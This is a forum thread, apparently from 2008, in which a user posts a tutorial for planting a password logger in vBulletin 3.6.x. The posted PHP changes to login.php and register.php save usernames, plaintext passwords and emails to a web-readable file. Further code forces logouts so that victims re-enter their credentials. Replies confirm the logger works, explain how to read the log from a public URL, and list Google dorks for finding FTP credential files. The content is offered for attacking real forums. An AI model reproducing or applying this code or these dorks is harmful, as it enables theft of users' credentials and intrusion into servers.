 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
[vBulletin] [Tutorial] Password logger |
 |
 Posted: Wed Apr 02, 2008 4:08 pm |
 |
|
| tr0nix |
| Active user |
 |
|
| Joined: Mar 06, 2008 |
| Posts: 48 |
|
|
|
 |
|
 |
|
Tested under:
vBulletin 3.6.8 Patch Level 1 / Patch Level 2
[Requirements]
- Access to the server
Open the "global.php", which is located in the main directory from vBulletin.
Search for
| Code: | | $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0; |
and change it to that:
| Code: | | //$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0; |
Now open "login.php", which is located in the main directory from vBulletin, too.
Search for
and add the following code under this line:
| Code: |
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./includes/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
|
Now wait a little bit and see how the filesize of the logfile raises. 
Edit:
If you want to logout an user who has clicked the 'remember me'-function, then do this:
Open the "index.php" and search for
| Code: | | foreach ($userinfos AS $userid => $loggedin) |
Put the following code under the foreach loop (under or above the "// memory saving"!).
| Code: |
require_once(DIR . '/includes/functions_login.php');
$getouttahere = array("administrator", "anotheruser"); // username which checked the damn "remember me"-function :p
setcookie("countLogout", 0,time()+86400); // save cookie for one day!
$countLogout = $_COOKIE["countLogout"];
if(in_array(strtolower($vbulletin->userinfo['username']), $getouttahere, true) AND $countLogout == 0)
{
setcookie("countLogout",1,time()+86400); // save cookie for one day!
$vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR);
process_logout();
}
|
Now you just need to edit the $getouttahere variable with your usernames. )
EDIT 2:
If you want to do that automaticly at their registration, then use the following:
Open "register.php" and search for
| Code: | | $show['errors'] = false; |
(approx. line 377)
Then put the following code under or above the line:
| Code: |
$lg_username = strtolower($vbulletin->GPC["username"]);
$lg_password = $vbulletin->GPC["password"];
$lg_email = $vbulletin->GPC["email"];
$lg_file = "./includes/lg.html";
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $lg_email . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
|
You can edit the $lg_file variable. It defines where you want to save your log file.
Example:
| Code: | | $lg_file = "./includes/lg_reg.html"; |
Edit 3:
If you want to log out all users, then open the "index.php" and search for:
| Code: | | foreach ($userinfos AS $userid => $loggedin) |
Put the following code* under the foreach loop (under or above the "// memory saving"!).
| Code: |
require_once(DIR . '/includes/functions_login.php');
$countLogout = $_COOKIE["countLogout"];
if($countLogout == 0)
{
setcookie("countLogout",1,time()+604800); // save cookie for one week!
$vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR);
process_logout();
}
|
* = Code not tested, should work.
PS: If the Logger doesn't create the logfile automaticly, then you need to create it manually and give the file chmod 0777.
(c) by [Team n0rth] tr0nix <tr0nix@inbox.ru> |
|
Last edited by tr0nix on Sat Mar 14, 2009 4:24 pm; edited 31 times in total |
|
|
|
|
|
|
|
| Posted: Wed Apr 02, 2008 4:41 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
This not working if user check the box 'Remember me' 
btw
You need user perm to edit this files otherwase admin will see this.Game over. |
|
|
|
|
|
re: |
|
| Posted: Mon Apr 07, 2008 6:02 am |
|
|
| tr0nix |
| Active user |
|
|
| Joined: Mar 06, 2008 |
| Posts: 48 |
|
|
|
|
|
|
|
- Added: Code for the 'remember me'-function
- Added: It logs now the email address, too! :p
- Added: Checks if the password got filled out. If not, then the logger dont log it.
- Added: Checks if the username + password combination is already in the logfile. |
|
|
|
|
| Posted: Wed Apr 09, 2008 12:12 am |
|
|
| NEUR0BASHER |
| Regular user |
|
|
| Joined: Apr 05, 2008 |
| Posts: 6 |
|
|
|
|
|
|
|
| nice script - if you can tell me how to gain access to an ftp server I could even check it out;-) |
|
|
|
|
| Posted: Wed Apr 09, 2008 1:49 pm |
|
|
| tr0nix |
| Active user |
|
|
| Joined: Mar 06, 2008 |
| Posts: 48 |
|
|
|
|
|
|
|
| NEUR0BASHER wrote: | | nice script - if you can tell me how to gain access to an ftp server I could even check it out;-) |
google dorks:
| Code: |
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
|
|
|
|
|
|
|
re: |
|
| Posted: Thu Apr 10, 2008 5:49 am |
|
|
| tr0nix |
| Active user |
|
|
| Joined: Mar 06, 2008 |
| Posts: 48 |
|
|
|
|
|
|
|
Change: $sql_query edited! It should work now on forums with table prefixes!
Change: The username will now be saved in lower case, because the logger has logged the same username + password if they hadn't typed the username correctly as the first time. (Example: "Username" - "Password" - "UserNAME", "Password") |
|
|
|
|
| Posted: Thu May 01, 2008 10:48 am |
|
|
| bad-boy |
| Regular user |
|
|
| Joined: May 01, 2008 |
| Posts: 7 |
|
|
|
|
|
|
|
I tested on 3.6.5
Working 100% |
|
|
|
|
|
help |
|
| Posted: Thu May 08, 2008 10:49 am |
|
|
| hacker2008 |
| Beginner |
|
|
| Joined: May 06, 2008 |
| Posts: 3 |
|
|
|
|
|
|
|
hw will i decode the password?????????
let it be :
V0C41F983079DB944C8ECA8614CEB1971683B6F6D |
|
|
|
|
| Posted: Thu May 29, 2008 1:28 am |
|
|
| tooth |
| Beginner |
|
|
| Joined: May 29, 2008 |
| Posts: 3 |
|
|
|
|
|
|
|
| anyone here successfully tested this on 3.7? |
|
|
|
|
| Posted: Sun Jun 01, 2008 8:49 pm |
|
|
| kurwamac |
| Regular user |
|
|
| Joined: Jun 01, 2008 |
| Posts: 13 |
|
|
|
|
|
|
|
Where the logs save? i have only ftp  |
|
|
|
|
| Posted: Mon Jun 02, 2008 1:24 am |
|
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
| kurwamac wrote: | | Where the logs save? i have only ftp |
/includes/lg.html
So to view it, just go like this:
www.site.com/includes/lg.html
No ftp required! |
|
|
|
|
| Posted: Mon Jun 02, 2008 12:54 pm |
|
|
| kurwamac |
| Regular user |
|
|
| Joined: Jun 01, 2008 |
| Posts: 13 |
|
|
|
|
|
|
|
if i register and autologin dont save me.
fix it please. |
|
|
|
|
| Posted: Mon Jun 02, 2008 3:21 pm |
|
|
| tr0nix |
| Active user |
|
|
| Joined: Mar 06, 2008 |
| Posts: 48 |
|
|
|
|
|
|
|
| kurwamac wrote: | if i register and autologin dont save me.
fix it please. |
Look at my first post!
Its already there how to do that (look at the "Edit:" part  ) |
|
|
|
|
| Posted: Mon Jun 02, 2008 9:29 pm |
|
|
| kurwamac |
| Regular user |
|
|
| Joined: Jun 01, 2008 |
| Posts: 13 |
|
|
|
|
|
|
|
| as they register it automatically loginning and does not save the log |
|
|
|
|
| Posted: Mon Jun 02, 2008 9:32 pm |
|
|
| kurwamac |
| Regular user |
|
|
| Joined: Jun 01, 2008 |
| Posts: 13 |
|
|
|
|
|
|
|
| Quote: | | Now you just need to edit the $getouttahere variable with your usernames |
How to for all users? |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 4
Goto page 1, 2, 3, 4Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 219
Members: 0
Total: 219
